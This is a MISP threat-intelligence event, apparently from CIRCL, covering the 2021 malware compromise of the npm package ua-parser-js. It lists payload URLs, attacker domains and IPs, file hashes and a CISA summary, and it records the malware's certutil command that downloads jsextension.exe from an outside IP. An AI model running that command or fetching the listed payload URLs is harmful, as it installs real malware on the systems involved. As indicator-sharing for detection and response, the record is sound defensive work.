{ "Event": { "analysis": "2", "date": "2021-10-24", "extends_uuid": "", "info": "Malware Discovered in Popular NPM Package, ua-parser-js", "publish_timestamp": "1635064007", "published": true, "threat_level_id": "2", "timestamp": "1635063955", "uuid": "ad7665ec-fef2-44eb-a019-b1b25a8aec05", "Orgc": { "name": "CIRCL", "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f" }, "Tag": [ { "colour": "#004646", "local": "0", "name": "type:OSINT", "relationship_type": "" }, { "colour": "#0071c3", "local": "0", "name": "osint:lifetime=\"perpetual\"", "relationship_type": "" }, { "colour": "#0087e8", "local": "0", "name": "osint:certainty=\"50\"", "relationship_type": "" }, { "colour": "#ffffff", "local": "0", "name": "tlp:white", "relationship_type": "" }, { "colour": "#053a00", "local": "0", "name": "misp-galaxy:mitre-attack-pattern=\"Compromise Software Supply Chain - T1195.002\"", "relationship_type": "" }, { "colour": "#0088cc", "local": "0", "name": "misp-galaxy:mitre-attack-pattern=\"Compromise Software Dependencies and Development Tools - T1195.001\"", "relationship_type": "" } ], "Attribute": [ { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1635061972", "to_ids": false, "type": "link", "uuid": "e9d82a66-46bd-4f0e-aeac-17349abddeb0", "value": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1635062091", "to_ids": false, "type": "link", "uuid": "508a294c-876e-4a8a-a3bd-a3de15e10325", "value": "https://github.com/faisalman/ua-parser-js/issues/536" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1635062310", "to_ids": false, "type": "url", "uuid": "f51805cb-5fec-4ce1-b7ae-1d1206720542", "value": "http://159.148.186.228/download/jsextension.exe" }, { "category": "Payload delivery", "comment": "", "deleted": false, 
"disable_correlation": false, "timestamp": "1635062343", "to_ids": true, "type": "url", "uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83", "value": "https://citationsherbe.at/sdd.dll" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1635062385", "to_ids": true, "type": "domain", "uuid": "3e4cc221-dbb9-4e64-9523-800d8af8f972", "value": "citationsherbe.at" }, { "category": "Artifacts dropped", "comment": "sdd.dll", "deleted": false, "disable_correlation": false, "timestamp": "1635062444", "to_ids": true, "type": "sha256", "uuid": "1b1a28a9-2b47-43a3-92b9-c9353497f429", "value": "2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd" }, { "category": "Artifacts dropped", "comment": "jsextension.exe", "deleted": false, "disable_correlation": false, "timestamp": "1635062474", "to_ids": true, "type": "sha256", "uuid": "9163b990-5b87-413c-a8e7-f616b908157f", "value": "47dded0efc230c3536f4db1e2e476afd3eda8d8ea0537db69d432322cdbac9ca" } ], "Object": [ { "comment": "", "deleted": false, "description": "Metadata used to generate an executive level report", "meta-category": "misc", "name": "report", "template_uuid": "70a68471-df22-4e3f-aa1a-5a3be19f82df", "template_version": "4", "timestamp": "1635063955", "uuid": "30866961-7eda-4bb7-a5e8-cb0bfeebce4c", "ObjectReference": [ { "comment": "", "object_uuid": "30866961-7eda-4bb7-a5e8-cb0bfeebce4c", "referenced_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "relationship_type": "alerts", "timestamp": "1635063955", "uuid": "892ba669-5323-41f2-b7bf-9093d813aea2" } ], "Attribute": [ { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "link", "timestamp": "1635061938", "to_ids": false, "type": "link", "uuid": "10d9ac50-3208-4cff-9d07-c2bec1c192c8", "value": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js" }, { "category": "Other", 
"comment": "", "deleted": false, "disable_correlation": false, "object_relation": "summary", "timestamp": "1635061938", "to_ids": false, "type": "text", "uuid": "5faebe54-7492-4f23-99f8-edf5e24e5424", "value": "Versions of a popular NPM package named ua-parser-js were found to contain malicious code. ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. A computer or device with the affected software installed or running could allow a remote attacker to obtain sensitive information or take control of the system. \r\n\r\nCISA urges users and administrators using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions: 0.7.30, 0.8.1, 1.0.1. Because the compromised versions themselves run the download command recorded in this event and drop jsextension.exe / sdd.dll, updating alone does not clean a host that already installed one of them: check such hosts for the dropped artifacts and the network indicators listed here and treat any match as a compromise. \r\n\r\nFor more information, see Embedded malware in ua-parser-js." }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "type", "timestamp": "1635061938", "to_ids": false, "type": "text", "uuid": "0e1e4035-31a1-4df6-8aa9-2a6208f7f601", "value": "Alert" } ] }, { "comment": "", "deleted": false, "description": "Command line and option related to a software malicious or not to execute specific commands.", "meta-category": "misc", "name": "command-line", "template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf", "template_version": "1", "timestamp": "1635063837", "uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "ObjectReference": [ { "comment": "", "object_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "referenced_uuid": "e1f2c049-da88-4238-9dde-4134209c1364", "relationship_type": "is-in-relation-with", "timestamp": "1635062957", "uuid": "97af4dfa-5d0a-47c5-ba72-e00f65c25482" }, { "comment": "", "object_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "referenced_uuid": "f51805cb-5fec-4ce1-b7ae-1d1206720542", "relationship_type": "downloads", "timestamp": "1635063003", "uuid": "e205642b-21b0-4daa-a28f-275219dba1ba" }, { "comment": "", "object_uuid": 
"459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "referenced_uuid": "9163b990-5b87-413c-a8e7-f616b908157f", "relationship_type": "related-to", "timestamp": "1635063837", "uuid": "d3629ef3-282a-4527-813e-ec8fa5be906d" } ], "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "value", "timestamp": "1635062024", "to_ids": false, "type": "text", "uuid": "974258e7-2e79-413c-9be8-08698653b87b", "value": "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "description", "timestamp": "1635062024", "to_ids": false, "type": "text", "uuid": "e3df3b20-a215-40d4-ae1a-a9ed768de240", "value": "Download command the compromised ua-parser-js package attempts to run via cmd.exe to fetch jsextension.exe from 159.148.186.228. Note: certutil's download switch is spelled -urlcache; confirm the recorded -rulcache form against the referenced GitHub issue before building detections on this exact string." } ] }, { "comment": "", "deleted": false, "description": "Command line and option related to a software malicious or not to execute specific commands.", "meta-category": "misc", "name": "command-line", "template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf", "template_version": "1", "timestamp": "1635063109", "uuid": "57d3ed7e-eda9-4e5e-b7ac-a813415e9006", "ObjectReference": [ { "comment": "Checking the date range of vulnerable packages", "object_uuid": "57d3ed7e-eda9-4e5e-b7ac-a813415e9006", "referenced_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "relationship_type": "identifies", "timestamp": "1635063109", "uuid": "7b9af0b8-1e55-4ac8-ad04-5b96b576fc98" } ], "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "value", "timestamp": "1635062225", "to_ids": false, "type": "text", "uuid": "4834122d-b43b-4b8d-a9d1-3085611ebaec", "value": "npm show ua-parser-js time", "Tag": [ { "colour": "#0fbf00", "local": "0", "name": "cycat:scope=\"detection\"", "relationship_type": "" } ] }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": 
"description", "timestamp": "1635062193", "to_ids": false, "type": "text", "uuid": "542061ee-8993-44ef-8261-f27f25dc9067", "value": "Lists the registry publish timestamp of every ua-parser-js version. Use it to bound the window in which the compromised versions (0.7.29, 0.8.0, 1.0.0) were available for download; it does not show when a package was installed on a local host." } ] }, { "comment": "", "deleted": false, "description": "A domain/hostname and IP address seen as a tuple in a specific time frame.", "meta-category": "network", "name": "domain-ip", "template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734", "template_version": "10", "timestamp": "1635063682", "uuid": "116cfff2-f422-4b59-a5aa-630fc443be4b", "ObjectReference": [ { "comment": "", "object_uuid": "116cfff2-f422-4b59-a5aa-630fc443be4b", "referenced_uuid": "3e4cc221-dbb9-4e64-9523-800d8af8f972", "relationship_type": "is-in-relation-with", "timestamp": "1635063351", "uuid": "83bd1f6f-8d62-4da9-a6d5-4f74d5ea48e1" }, { "comment": "", "object_uuid": "116cfff2-f422-4b59-a5aa-630fc443be4b", "referenced_uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83", "relationship_type": "related-to", "timestamp": "1635063682", "uuid": "177395ef-d715-4122-97ca-be60b7b975fb" } ], "Attribute": [ { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "domain", "timestamp": "1635062540", "to_ids": true, "type": "domain", "uuid": "75318d44-9526-43f4-9f8c-c24edf26a83f", "value": "citationsherbe.at" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "ip", "timestamp": "1635062540", "to_ids": true, "type": "ip-dst", "uuid": "dc052f3a-24fa-4595-8deb-6efb68b59d64", "value": "95.213.165.20" } ] }, { "comment": "", "deleted": false, "description": "A domain/hostname and IP address seen as a tuple in a specific time frame.", "meta-category": "network", "name": "domain-ip", "template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734", "template_version": "10", "timestamp": "1635062582", "uuid": "e1f2c049-da88-4238-9dde-4134209c1364", "Attribute": [ { "category": "Network activity", "comment": "", "deleted": 
false, "disable_correlation": false, "object_relation": "ip", "timestamp": "1635062582", "to_ids": true, "type": "ip-dst", "uuid": "2c40cba0-709f-42e0-8f09-9373862a40ac", "value": "159.148.186.228" } ] }, { "comment": "Vulnerable npm package UAParser.js - '0.7.29': '2021-10-22T12:15:21.378Z',\r\n'0.7.30': '2021-10-22T16:16:08.807Z',\r\n\r\n'0.8.0': '2021-10-22T12:16:06.877Z',\r\n'0.8.1': '2021-10-22T16:23:53.062Z',\r\n\r\n'1.0.0': '2021-10-22T12:16:19.726Z',\r\n'1.0.1': '2021-10-22T16:26:19.004Z',\r\n", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1635063704", "uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "ObjectReference": [ { "comment": "", "object_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "referenced_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "relationship_type": "executes", "timestamp": "1635062818", "uuid": "73a1835e-a0dc-40f2-a86a-172af4025954" }, { "comment": "", "object_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "referenced_uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83", "relationship_type": "downloads", "timestamp": "1635063384", "uuid": "9f095fe7-ced7-4685-942b-5cbfa35b32c4" }, { "comment": "", "object_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "referenced_uuid": "508a294c-876e-4a8a-a3bd-a3de15e10325", "relationship_type": "describes", "timestamp": "1635063704", "uuid": "2a6e821d-81d7-45a6-b420-f8929fc38035" } ], "Attribute": [ { "category": "Payload installation", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "pattern-in-file", "timestamp": "1635062757", "to_ids": true, "type": "pattern-in-file", "uuid": "fbc77d66-169a-48bb-82c5-7ce5c847e205", "value": "ua-parser-js" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", 
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1635063451", "uuid": "bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b", "ObjectReference": [ { "comment": "", "object_uuid": "bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b", "referenced_uuid": "a9b50a3c-793f-4541-a123-60716668e2d5", "relationship_type": "analysed-with", "timestamp": "1635063452", "uuid": "e0b56508-2235-4dd3-ad3f-ebf948afa2bf" } ], "Attribute": [ { "category": "Artifacts dropped", "comment": "sdd.dll", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1635062444", "to_ids": true, "type": "md5", "uuid": "1b724674-e8c6-4deb-a32b-b6cf86b591a6", "value": "de8b54a938ac18f15cad804d79a0e19d" }, { "category": "Artifacts dropped", "comment": "sdd.dll", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1635062444", "to_ids": true, "type": "sha1", "uuid": "88ee0d56-6d8a-4869-9443-1dbe333121c2", "value": "b6004c62e2d9dbad9cfd5f7e18647ac983788766" }, { "category": "Artifacts dropped", "comment": "sdd.dll", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1635062444", "to_ids": true, "type": "sha256", "uuid": "22a01316-f9ba-4889-9d29-eaf021bb104b", "value": "2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "4", "timestamp": "1635063777", "uuid": "a9b50a3c-793f-4541-a123-60716668e2d5", "ObjectReference": [ { "comment": "", "object_uuid": "a9b50a3c-793f-4541-a123-60716668e2d5", "referenced_uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83", "relationship_type": "related-to", "timestamp": "1635063777", "uuid": "3055c698-4f96-41d1-819b-26520b4b5eea" } ], "Attribute": [ { "category": "Other", "comment": "sdd.dll", "deleted": false, "disable_correlation": 
true, "object_relation": "last-submission", "timestamp": "1635062444", "to_ids": false, "type": "datetime", "uuid": "a38e6a9c-1573-4b68-b9ee-dfdda8eb57ed", "value": "2021-10-24T04:03:55+00:00" }, { "category": "External analysis", "comment": "sdd.dll", "deleted": false, "disable_correlation": true, "object_relation": "permalink", "timestamp": "1635062444", "to_ids": false, "type": "link", "uuid": "37fe948f-89f7-4316-bdf3-c88fdbd16b11", "value": "https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/detection/f-2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd-1635048235" }, { "category": "Artifacts dropped", "comment": "sdd.dll", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1635062444", "to_ids": false, "type": "text", "uuid": "b36b2447-2d9b-4993-b23b-2ff46ad63d7c", "value": "23/50" } ] } ] } }